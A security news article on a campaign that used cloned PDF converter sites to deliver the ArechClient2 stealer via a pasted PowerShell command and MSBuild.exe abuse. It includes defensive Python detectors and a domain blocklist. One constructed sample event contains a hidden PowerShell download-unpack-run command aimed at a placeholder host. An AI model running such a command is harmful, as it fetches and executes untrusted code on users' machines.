This Fake PDF Converter Is Stealing Your Data with Malware


A new campaign is using fake online file converters to deliver data-stealing malware. According to researchers at CloudSEK, the operators lure users to bogus PDF conversion sites and trick them into installing ArechClient2 (also tracked as SectopRAT), a capable information stealer. 

This comes after the public alert issued by the FBI’s Denver office, which warned of malicious online file converters being used to deliver malware. So, let’s take a closer look at how this malware works and what you can do to stay safe from it. 

Which Websites Are Involved?

According to CloudSEK’s report, the attackers set up two deceptive websites, candyxpdf[.]com and candyconverterpdf[.]com, that closely mimic pdfcandy.com, a legitimate and widely used online PDF converter. 

The copycat sites draw far less traffic than the original, but the report puts them at roughly 2,300 and 4,100 visits, respectively, in March 2025. That is enough to show that impersonating high-traffic utilities has become a viable way to distribute malware. 

How Does the Attack Work?

  1. The user uploads a file for conversion.
  2. The site shows a fake loading animation, then a CAPTCHA.
  3. After the CAPTCHA, the user is told to run a PowerShell command.
  4. That command downloads a ZIP archive (adobe.zip) containing audiobit.exe.
  5. audiobit.exe launches MSBuild.exe, a legitimate, signed Microsoft build tool, and uses it to load and run the ArechClient2 payload, so the malware executes under a trusted Windows binary.

Once running, the stealer collects browser-saved credentials, cryptocurrency wallet data, and other personal information from the machine.
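The chain above leaves a recognisable trail in endpoint process-creation telemetry: a PowerShell process started from the user’s shell with a download-and-unpack command, followed by MSBuild.exe spawned from something that is not a build tool. The Python below is an added example written for this article, not CloudSEK’s or the attackers’ code; the events, paths and command lines are constructed to match the description above (the real campaign’s command is not reproduced here), and the parent-process allow-lists are assumptions an analyst would tune to their own environment.

```python
"""Spot the fake-converter chain (pasted PowerShell -> dropped EXE -> MSBuild.exe)
in process-creation events.

Added example for this article, not CloudSEK's or the campaign's code.
All events, paths and command lines below are constructed; the real campaign's
PowerShell one-liner is not reproduced here.
"""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    cmdline: str


# Assumption: MSBuild.exe is only expected under build tooling. Tune per estate.
EXPECTED_MSBUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe"}

# Where a command pasted by a user lands: the Run dialog (parent explorer.exe) or a
# console the user already had open.
USER_LAUNCHERS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

# Tokens that turn an interactive PowerShell into a downloader/unpacker.
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|"
    r"start-bitstransfer|expand-archive|\bcurl\b|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[tuple[str, int, str]]:
    """Return (rule, pid, detail) findings, correlating MSBuild back to a pasted command."""
    by_pid = {e.pid: e for e in events}
    findings: list[tuple[str, int, str]] = []
    pasted: set[int] = set()

    # Rule 1: PowerShell launched from a user context with download/unpack tokens.
    for e in events:
        if (_base(e.image) in {"powershell.exe", "pwsh.exe"}
                and _base(e.parent_image) in USER_LAUNCHERS
                and DOWNLOAD_RE.search(e.cmdline)):
            pasted.add(e.pid)
            findings.append(("pasted_download_command", e.pid,
                             f"{_base(e.parent_image)} -> {_base(e.image)}: {e.cmdline[:80]}"))

    # Rule 2: MSBuild.exe from a non-build parent; escalate if a flagged PowerShell
    # is anywhere in its ancestry (audiobit.exe sits between them in this campaign).
    for e in events:
        if _base(e.image) != "msbuild.exe" or _base(e.parent_image) in EXPECTED_MSBUILD_PARENTS:
            continue
        anc, hops, chained = by_pid.get(e.ppid), 0, False
        while anc is not None and hops < 10:
            if anc.pid in pasted:
                chained = True
                break
            anc, hops = by_pid.get(anc.ppid), hops + 1
        rule = "msbuild_from_pasted_powershell" if chained else "msbuild_unexpected_parent"
        findings.append((rule, e.pid, f"{_base(e.parent_image)} -> msbuild.exe"))
    return findings


# Constructed sample telemetry (Sysmon Event ID 1 style); not real captured events.
SAMPLE_EVENTS = [
    ProcEvent(4100, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r'powershell -w hidden -c "Invoke-WebRequest https://example.invalid/adobe.zip '
              r'-OutFile $env:TEMP\adobe.zip; Expand-Archive $env:TEMP\adobe.zip $env:TEMP\adobe; '
              r'& $env:TEMP\adobe\audiobit.exe"'),
    ProcEvent(4200, 4100, r"C:\Users\alice\AppData\Local\Temp\adobe\audiobit.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "audiobit.exe"),
    ProcEvent(4300, 4200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"C:\Users\alice\AppData\Local\Temp\adobe\audiobit.exe",
              r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\adobe\task.proj"),
    # Benign: a developer building from Visual Studio.
    ProcEvent(5000, 4800, r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe",
              r"C:\Program Files\Microsoft Visual Studio\2022\Common7\IDE\devenv.exe",
              "MSBuild.exe app.csproj"),
    # Benign: a user simply opening PowerShell.
    ProcEvent(5100, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "powershell.exe"),
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
```

Feed it Sysmon Event ID 1 or EDR process events. The second rule walks the parent chain rather than matching only the direct parent, so the MSBuild alert is tied to the PowerShell that started the chain even with the dropped executable in between; a lone MSBuild.exe from an unexpected parent still fires at lower confidence.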

How Are Users Being Tricked?

The attackers clone the look of the legitimate site and add realistic details such as loading animations and CAPTCHA screens, so the page feels authentic. The tell is the sudden instruction to run a PowerShell command: no real file converter needs that, but the attackers count on urgency and confusion to get the user past the moment of doubt.

This campaign highlights how cybercriminals exploit everyday digital tools. By combining psychological manipulation with technical sophistication, attackers are turning routine tasks into entry points for data theft.

Varun Ajmera, Threat Intelligence Researcher at CloudSEK

What Can You Do to Stay Safe?

CloudSEK has issued the following recommendations for users and organizations: 

  • Use verified tools from official sources for file conversions.
  • Avoid executing commands from unknown or suspicious websites.
  • Keep security tools updated, including antivirus and DNS filtering solutions.
  • Train users to recognize suspicious behaviors like unexpected CAPTCHAs or command-line instructions.
  • Use offline tools where possible to limit exposure to online threats.
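Two of the recommendations above, DNS filtering and sticking to verified tools, can be partly automated: block the domains named in the report and flag anything that looks like pdfcandy.com without being it (the two deceptive domains in the “Which Websites Are Involved?” section are exactly such recombinations of the brand’s words). The Python below is an added example, not CloudSEK’s tooling; the brand token list, the registrable-domain shortcut, and the DNS log lines are constructed assumptions.

```python
"""Review DNS query logs for the converter domains named in the report and for
lookalikes of the brand they impersonate.

Added example for this article, not CloudSEK's tooling. The log lines, client
addresses and timestamps are constructed; the brand token list is an assumption.
"""
from __future__ import annotations
import re

# The two deceptive domains from CloudSEK's report, kept defanged as published.
BLOCKLIST = {"candyxpdf[.]com", "candyconverterpdf[.]com"}

# Brand to protect and the words an impersonator would recombine (our assumption).
PROTECTED = {"pdfcandy.com": ("pdf", "candy")}

# One constructed log line per query: timestamp, client, query type, name.
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$")


def refang(domain: str) -> str:
    """Lower-case, turn '[.]' back into '.', drop a trailing dot."""
    return domain.strip().lower().replace("[.]", ".").rstrip(".")


def registrable(domain: str) -> str:
    """Last two labels. Assumption: single-label public suffixes only (no .co.uk)."""
    return ".".join(refang(domain).split(".")[-2:])


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance, used for typosquats such as one swapped letter."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


BLOCKED = {refang(d) for d in BLOCKLIST}


def classify(domain: str) -> tuple[str, str]:
    """Return ('blocked' | 'lookalike' | 'allow', reason) for one queried name."""
    reg = registrable(domain)
    if reg in BLOCKED:
        return "blocked", "domain named in the CloudSEK report"
    label = reg.split(".")[0]
    for brand, tokens in PROTECTED.items():
        if reg == brand:
            return "allow", "the protected brand itself"
        brand_label = brand.split(".")[0]
        # candyxpdf / candyconverterpdf: every brand word present, reordered or padded.
        if all(t in label for t in tokens):
            return "lookalike", f"recombines the words of {brand}"
        # pdfcamdy: a character or two away from the brand label.
        if levenshtein(label, brand_label) <= 2:
            return "lookalike", f"within edit distance 2 of {brand_label}"
    return "allow", "no match"


def review_log(lines: list[str]) -> list[tuple[str, str, str, str]]:
    """(client, domain, verdict, reason) for every query that should not simply pass."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        verdict, reason = classify(m["qname"])
        if verdict != "allow":
            hits.append((m["client"], refang(m["qname"]), verdict, reason))
    return hits


# Constructed resolver log; not real traffic.
SAMPLE_LOG = [
    "2025-03-14T10:02:11Z 10.0.0.23 A pdfcandy.com",
    "2025-03-14T10:02:12Z 10.0.0.23 A cdn.pdfcandy.com",
    "2025-03-14T10:05:40Z 10.0.0.41 A candyxpdf.com",
    "2025-03-14T10:06:02Z 10.0.0.41 A candyconverterpdf.com",
    "2025-03-14T10:09:15Z 10.0.0.57 A pdfcamdy.com",
    "2025-03-14T10:11:03Z 10.0.0.57 AAAA example.com",
]

if __name__ == "__main__":
    for client, domain, verdict, reason in review_log(SAMPLE_LOG):
        print(f"{verdict:9} {client:10} {domain:25} {reason}")
```

Known-bad names are hard-blocked; lookalikes are surfaced for review rather than blocked outright, since the token heuristic will also catch harmless names that happen to contain both words. The registrable-domain shortcut (last two labels) is enough for this example but should be replaced with a public-suffix list in production.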

Bottom Line

None of this is new. Attackers keep adapting to everyday digital habits, and when a convincing phishing lure is paired with abuse of trusted Windows binaries such as MSBuild.exe, a routine task like converting a document can end in a serious compromise. That is why vigilance, and sticking to tools from trusted sources, matters more than ever. 
